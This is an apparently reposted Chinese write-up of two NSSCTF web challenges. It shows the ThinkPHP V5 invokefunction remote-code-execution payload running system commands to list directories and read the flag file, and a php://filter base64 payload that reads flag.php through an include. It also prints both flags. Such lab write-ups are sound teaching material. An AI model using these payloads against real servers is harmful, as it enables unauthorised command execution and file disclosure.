欢乐狗 发表于 2024-6-27 06:20:47

NSSCTF-Web题目7

目录

ez_rce
1、题目
2、知识点
3、思绪


​编辑
baby_file
1、题目
2、知识点
3、思绪

ez_rce

1、题目

https://img-blog.csdnimg.cn/direct/37d117433532484bb7cbfad1596d7d07.png
2、知识点

   ThinkPHP V5 框架毛病的利用,下令执行
由于ThinkPHP5在处理控制器传参时,没有对参数进行充分的过滤与验证,导致恶意用户可以通过提交恶意数据,构造出一个带有PHP函数的控制器方法,并通过URL参数的形式访问该方法,从而触发长途代码执行毛病。
3、思绪





https://img-blog.csdnimg.cn/direct/6367db7942394030a24f20baa6beef0d.png

打开题目,发现什么都没有,源代码里面也什么都没有,这时间实验目录扫描
https://img-blog.csdnimg.cn/direct/37735c90ea2b46f8b8e71018f56d6176.png
访问这个文件
https://img-blog.csdnimg.cn/direct/e6d4f911cd874afeaeeb2d37aee02e08.png
接着访问提示文件
https://img-blog.csdnimg.cn/direct/da0a3fe5d05f49d3ba886db196dd72a6.png
效果出现一个框架界面,ThinkPHP V5的框架,没有其他提示,上网搜一下这个框架,发现有一个长途执行下令的毛病。
可以记住这一个框架毛病,以后大概会利用到
   利用poc如下:
url+?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=系统执行下令
http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=ls /
https://img-blog.csdnimg.cn/direct/710fd2a483f14eee8b58c1d84307f2fe.png​
发现flag文件,效果打开什么都没有,找其他flag文件
http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=find / -name 'flag'
https://img-blog.csdnimg.cn/direct/bdd806aaa3b14a4c83d9b6d012717a82.png
在 /nss/ctf/flag/flag 找到flag
http://node5.anna.nssctf.cn:29371/NSS/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars=system&vars[]=cat /nss/ctf/flag/flag
https://img-blog.csdnimg.cn/direct/dea7b18c40784add987978b378ad2bb3.png
 得到flag:NSSCTF{1671b36a-f1ad-4b41-98c7-ffbe7acb2959}
baby_file

1、题目

https://img-blog.csdnimg.cn/direct/832b97b8566f4f37a8575599f1ff97ce.png
2、知识点

php伪协议
3、思绪

https://img-blog.csdnimg.cn/direct/abc7ae1697914041814d8bb821246214.png
打开题目,出现源代码,没有其他提示,需要我们输入参数file的值
源码中有include()函数,考虑使用php伪协议,一般flag放在flag.php文件中
所以poc如下
?file=php://filter/read=convert.base64-encode/resource=flag.php
https://img-blog.csdnimg.cn/direct/6f49bc04c01f4a3aa3a6a258696cc0f3.png
将得到的base64编码进行解码
https://img-blog.csdnimg.cn/direct/fcb5982fdb7748fa9bfc38e51af71a8a.png
得到flag:NSSCTF{9906ab65-97ea-400e-a1fa-72d7847a2e7a}
这篇文章就先写到这里了,那里不懂的或者不足的欢迎指出

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: NSSCTF-Web题目7